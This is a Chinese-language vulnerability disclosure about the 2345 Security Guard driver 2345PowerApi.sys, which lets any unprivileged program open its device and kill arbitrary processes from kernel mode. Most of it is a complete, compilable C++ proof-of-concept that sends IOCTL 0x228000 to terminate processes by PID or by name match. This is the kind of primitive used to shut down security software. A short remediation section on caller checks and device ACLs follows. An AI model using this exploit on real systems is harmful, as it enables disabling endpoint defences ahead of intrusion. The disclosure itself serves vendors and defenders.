
2345安全卫士PowerApi驱动内核权限杀任意进程漏洞

2345安全卫士2022-06-13 阅读()
2345安全卫士采用最新的云计算技术以及全新的第三代查杀引擎,5重环绕式系统防护有效查杀各类新型流行木马。占用电脑磁盘空间小,闪电查杀更快更安全。

软件版本:1.3.0.5363
问题原因:2345PowerApi.sys 在设备被打开(IRP_MJ_CREATE)时不校验调用进程,也没有把设备对象限制为仅管理员/受信进程可访问,因此任意程序都可以用 CreateFile 打开 \\.\2345PowerApi,再通过 DeviceIoControl 下发控制码(本文 PoC 使用 0x228000,输入缓冲区为目标 PID),让驱动在内核态直接结束任意进程。这类"任何进程都能调用的内核能力"正是 BYOVD(借带漏洞的签名驱动关闭安全软件、提权)类攻击常用的利用面,危害不限于杀进程。

 

2345terminate.png

 

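// 2345.cpp : console PoC for the 2345PowerApi.sys "terminate arbitrary process" IOCTL.
//
// Windows-only (Win32 API + Toolhelp snapshot). The original listing pulled the
// SDK in through a "stdafx.h" precompiled header; the headers are included
// directly here so the file builds outside that project.
//
// Usage:
//   2345terminate -pid <pid>         terminate one process by PID
//   2345terminate -namelike <text>   terminate every process whose image name
//                                    contains <text> (case-sensitive substring)
#include <windows.h>
#include <tlhelp32.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <vector>
using namespace std;

// Device interface exposed by 2345PowerApi.sys. Per the write-up the driver
// performs no caller check on open, so any process can obtain a handle.
#define DEVICENAME L"\\\\.\\2345PowerApi"

// IOCTL that takes a DWORD PID in the input buffer and terminates that process
// from kernel mode. 0x228000 decodes as
// CTL_CODE(FILE_DEVICE_UNKNOWN, 0, METHOD_BUFFERED, FILE_WRITE_ACCESS), so the
// device handle must be opened with GENERIC_WRITE (see OpenPowerApiDevice).
#define IOCTL_2345_TERMINATE_PROCESS 0x228000

// Print the last Win32 error (numeric code plus the system message text),
// prefixed by preMsg when it is not NULL. Call it immediately after the
// failing API, before anything else can clobber GetLastError().
void PrintErrCodeMessage(char *preMsg)
{
    // Capture the code first: printf/FormatMessage may overwrite it.
    DWORD dwErrorCode = GetLastError();
    // Initialised: the original left this uninitialised and then tested it
    // after a failed FormatMessage, which is undefined behaviour.
    LPSTR lpMsgBuf = NULL;

    if (NULL != preMsg) {
        printf("%s\n", preMsg);
    }
    printf("Fail Code: %lu\r\n", (unsigned long)dwErrorCode);

    DWORD cch = FormatMessageA(
        FORMAT_MESSAGE_ALLOCATE_BUFFER | FORMAT_MESSAGE_FROM_SYSTEM | FORMAT_MESSAGE_IGNORE_INSERTS,
        NULL,                                       // lpSource: system message table
        dwErrorCode,
        MAKELANGID(LANG_NEUTRAL, SUBLANG_DEFAULT),
        (LPSTR)&lpMsgBuf,                           // receives a LocalAlloc'd buffer
        0,                                          // nSize: ignored with ALLOCATE_BUFFER
        NULL);                                      // no insert arguments
    if (cch != 0 && lpMsgBuf != NULL) {
        printf("Fail Message: %s\r\n", lpMsgBuf);
        LocalFree(lpMsgBuf);                        // ALLOCATE_BUFFER => caller frees
    } else {
        printf("Failed to fetch the Error Message\r\n");
    }
    // The original always printed "Open Device Failed!" here, even when the
    // caller was reporting a DeviceIoControl failure; the prefix now says
    // which call failed, so that misleading line is gone.
}

// Open the 2345PowerApi device for read/write. Prints the error and returns
// INVALID_HANDLE_VALUE on failure; the caller owns the handle otherwise.
static HANDLE OpenPowerApiDevice(void)
{
    HANDLE hDevice = CreateFileW(DEVICENAME,
                                 GENERIC_READ | GENERIC_WRITE,     // WRITE: IOCTL carries FILE_WRITE_ACCESS
                                 FILE_SHARE_READ | FILE_SHARE_WRITE,
                                 NULL,
                                 OPEN_EXISTING,
                                 0,
                                 NULL);
    if (hDevice == INVALID_HANDLE_VALUE) {
        PrintErrCodeMessage("[CreateFileW]");       // was "[CreateFileA]" though the W variant is called
    } else {
        printf("Open Device Success!\r\n");
    }
    return hDevice;
}

// Ask the driver to terminate dwPid. Returns TRUE when DeviceIoControl
// succeeded (the driver accepted the request), FALSE after printing the error.
static BOOL SendTerminateIoctl(HANDLE hDevice, DWORD dwPid)
{
    char szOutBuf[100] = {0};
    // Separate from the output-buffer size: the original reused nOutLen as
    // lpBytesReturned, so every call after the first passed a shrunken
    // (typically 0) nOutBufferSize in the -namelike loop.
    DWORD nBytesReturned = 0;

    BOOL ok = DeviceIoControl(hDevice,
                              IOCTL_2345_TERMINATE_PROCESS,
                              &dwPid, sizeof(dwPid),               // input: target PID
                              szOutBuf, sizeof(szOutBuf),          // output: not interpreted by this PoC
                              &nBytesReturned,
                              NULL);                               // synchronous
    if (!ok) {
        PrintErrCodeMessage("[DeviceIoControl]");
    } else {
        printf("DeviceIoControl Successed!\n");
    }
    return ok;
}

// Terminate a single process by PID through the driver.
// Returns 0 when the IOCTL succeeded, -1 when the device could not be opened
// or the IOCTL failed (the original returned 0 unconditionally).
int TerminateByPid(DWORD dwPid)
{
    HANDLE hDevice = OpenPowerApiDevice();
    if (hDevice == INVALID_HANDLE_VALUE) {
        return -1;
    }

    printf("press any key to continue!\n");
    getchar();

    BOOL ok = SendTerminateIoctl(hDevice, dwPid);
    CloseHandle(hDevice);
    return ok ? 0 : -1;
}

// Append to vPids the PID of every running process whose image file name
// contains szProcName (case-sensitive strstr match).
// Returns FALSE only when szProcName is NULL or the snapshot could not be
// taken; an empty result set is still TRUE.
// NOTE(review): szExeFile is compared with strstr, so this assumes a
// multi-byte (non-UNICODE) build, exactly as the original did.
BOOL GetPidsByNameLike(IN char szProcName[], OUT vector<DWORD> &vPids)
{
    if (NULL == szProcName) {
        return FALSE;
    }

    HANDLE hSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
    if (hSnap == INVALID_HANDLE_VALUE) {
        return FALSE;
    }

    PROCESSENTRY32 pe32 = {0};
    pe32.dwSize = sizeof(pe32);                      // required by Process32First
    if (Process32First(hSnap, &pe32)) {
        do {
            if (strstr(pe32.szExeFile, szProcName) != NULL) {
                vPids.push_back(pe32.th32ProcessID);
            }
        } while (Process32Next(hSnap, &pe32));
    }
    CloseHandle(hSnap);
    return TRUE;
}

// Terminate every process whose image name contains szNL.
// The snapshot is taken after the keypress so the PID list is fresh. Stops at
// the first failed IOCTL, like the original. Returns 0 when every issued IOCTL
// succeeded, -1 otherwise.
int TerminateByNL(char szNL[])
{
    HANDLE hDevice = OpenPowerApiDevice();
    if (hDevice == INVALID_HANDLE_VALUE) {
        return -1;
    }

    printf("press any key to continue!\n");
    getchar();

    vector<DWORD> vPids;
    GetPidsByNameLike(szNL, vPids);                  // return value ignored, as in the original
    DWORD dwSelf = GetCurrentProcessId();
    int rc = 0;

    for (size_t i = 0; i < vPids.size(); ++i) {
        DWORD dwPid = vPids[i];
        // Guard against killing the PoC itself, e.g. "-namelike 2345" also
        // matches 2345terminate.exe.
        if (dwPid == dwSelf) {
            printf("NL:%s , Pid:%lu (self, skipped)\n", szNL, (unsigned long)dwPid);
            continue;
        }
        printf("NL:%s , Pid:%lu\n", szNL, (unsigned long)dwPid);
        if (!SendTerminateIoctl(hDevice, dwPid)) {
            rc = -1;
            break;
        }
    }

    CloseHandle(hDevice);
    return rc;
}

// Print command-line usage.
void Useage(void)
{
    printf("使用方法,如下例子:\n");
    printf(" 2345terminate -pid xxx\n");
    printf(" 2345terminate -namelike xxx\n");
}

// Entry point. Plain main() instead of _tmain(): the original compared
// _TCHAR argv with strcmp/atoi, which only builds in a non-UNICODE project.
int main(int argc, char *argv[])
{
    if (argc != 3) {
        Useage();
        return -1;
    }

    if (strcmp(argv[1], "-pid") == 0) {
        // strtoul instead of atoi: atoi silently turned junk into PID 0.
        char *end = NULL;
        unsigned long pid = strtoul(argv[2], &end, 10);
        if (end == argv[2] || *end != '\0' || pid == 0) {
            printf("invalid pid: %s\n", argv[2]);
            Useage();
            return -1;
        }
        return TerminateByPid((DWORD)pid);
    }

    if (strcmp(argv[1], "-namelike") == 0) {
        return TerminateByNL(argv[2]);
    }

    Useage();
    return -1;
}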

 

解决方案:

在驱动里做好打开校验:在 IRP_MJ_CREATE 中校验调用进程(例如校验映像路径与数字签名,而不是只比对进程名,进程名可伪造),并用 IoCreateDeviceSecure 为设备对象设置严格的 SDDL,只允许 SYSTEM/管理员打开;同时每个 IOCTL 分发例程都要校验输入缓冲区长度和目标 PID,"结束任意进程"这类高危功能只应对自身受信进程开放。需要注意仅靠设备 ACL 并不能消除 BYOVD 风险(攻击者以管理员身份加载旧版签名驱动即可),已修复的版本还应配合吊销/拦截旧驱动。




